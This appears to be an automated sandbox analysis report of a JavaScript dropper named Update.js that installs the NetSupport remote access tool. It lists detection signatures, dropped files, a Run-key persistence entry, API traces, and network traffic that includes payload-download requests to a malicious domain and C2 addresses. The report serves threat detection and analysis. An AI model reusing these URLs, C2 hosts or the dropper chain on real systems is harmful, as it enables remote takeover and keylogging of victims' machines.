Edit tour

Windows Analysis Report
Update.js

Overview

General Information

Sample name:	Update.js
Analysis ID:	1563958
MD5:	ccf9a8f7a1c691f48d18cf0074a7b0f4
SHA1:	12bd2af814a12d41c2e8a8bb6ddb95afd025a3c1
SHA256:	8541701c72caab36dcb30937d6037ec9f29c6acb7c8f19bd0e21f282f969c479
Infos:

Detection

NetSupport RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Delayed program exit found

Deletes itself after installation

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5088 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

client32.exe (PID: 5104 cmdline: "C:\ProgramData\o2xqxqs\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)

client32.exe (PID: 1712 cmdline: "C:\ProgramData\o2xqxqs\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\o2xqxqs\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\o2xqxqs\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\o2xqxqs\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\o2xqxqs\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\o2xqxqs\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\o2xqxqs\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\ProgramData\o2xqxqs\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3110380129.0000000003082000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.3112198355.00000000111E2000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.3112145975.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000002.3112145975.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000003.2366516566.0000000005976000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.3109458678.00000000006B2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.3108971524.00000000006B2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000000.2064378537.00000000006B2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000003.2366162151.0000000005946000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.3111648585.0000000005995000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.3112664746.000000006C680000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000000.2045118939.00000000006B2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.3110380129.000000000306F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000003.2366408440.0000000005946000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author
5.2.client32.exe.73ac0000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
5.2.client32.exe.6b0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.73ac0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
5.0.client32.exe.6b0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.6b0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.6f8f0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
5.2.client32.exe.6f8f0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.0.client32.exe.6b0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
5.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
5.2.client32.exe.6c640000.3.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
5.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 12 entries

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 79.141.173.158, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5088, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 5088, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\o2xqxqs\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 5088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 79.141.173.158, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5088, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 5088, ProcessName: wscript.exe

Suricata Signatures

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T16:29:31.800389+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.4	49737	194.180.191.64	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://studioclic53.com/work/fix2.php?5436	Avira URL Cloud: Label: malware
Source: https://studioclic53.com/	Avira URL Cloud: Label: malware
Source: https://studioclic53.com/work/yyy.zip?5668	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\o2xqxqs\HTCTL32.DLL	ReversingLabs: Detection: 13%
Source: C:\ProgramData\o2xqxqs\client32.exe	ReversingLabs: Detection: 27%
Source: C:\ProgramData\o2xqxqs\remcmdstub.exe	ReversingLabs: Detection: 28%

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 5_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,

5_2_110ADA40

Source: C:\Windows\System32\wscript.exe

File opened: C:\ProgramData\o2xqxqs\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 79.141.173.158:443 -> 192.168.2.4:49730 version: TLS 1.2

Source:

Binary string: msvcr100.i386.pdb source: client32.exe

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	4_2_111273E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1102D9CA Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102D9CA
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102DD21
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	4_2_110663B0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	4_2_1106ABD0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F890F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6F890F84
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F88EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6F88EFE1
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F890B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6F890B33
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F88CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	4_2_6F88CA9B
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F890702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6F890702
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F88C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	4_2_6F88C775
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	5_2_111273E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	5_2_1102D9F4
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	5_2_1102DD21
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	5_2_1110BD70
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	5_2_110663B0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	5_2_1106ABD0

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4x nop then add byte ptr [edi], dh

4_2_6F848468

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49737 -> 194.180.191.64:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 79.141.173.158 443

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 104.26.1.231 104.26.1.231

Source: Joe Sandbox View	ASN Name: HZ-CA-ASBG HZ-CA-ASBG
Source: Joe Sandbox View	ASN Name: MIVOCLOUDMD MIVOCLOUDMD

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST /work/fix2.php?5436 HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: studioclic53.comContent-Length: 5Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /work/yyy.zip?5668 HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: studioclic53.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.191.64
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.191.64
Source: unknown	TCP traffic detected without corresponding DNS query: 194.180.191.64
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /work/yyy.zip?5668 HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: studioclic53.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: studioclic53.com
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST /work/fix2.php?5436 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: studioclic53.comContent-Length: 5Connection: Keep-AliveCache-Control: no-cache

Source: client32.exe	String found in binary or memory: http://%s/fakeurl.htm
Source: client32.exe	String found in binary or memory: http://%s/testpage.htm
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://0.30000000000000004.com/
Source: client32.exe	String found in binary or memory: http://127.0.0.1
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dev.w3.org/csswg/cssom/#resolved-values
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript
Source: client32.exe	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jsperf.com/getall-vs-sizzle/2
Source: wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=491668
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=649285
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=333868
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=378607
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=449857
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
Source: wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/apache/echarts/issues/14266
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
Source: wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
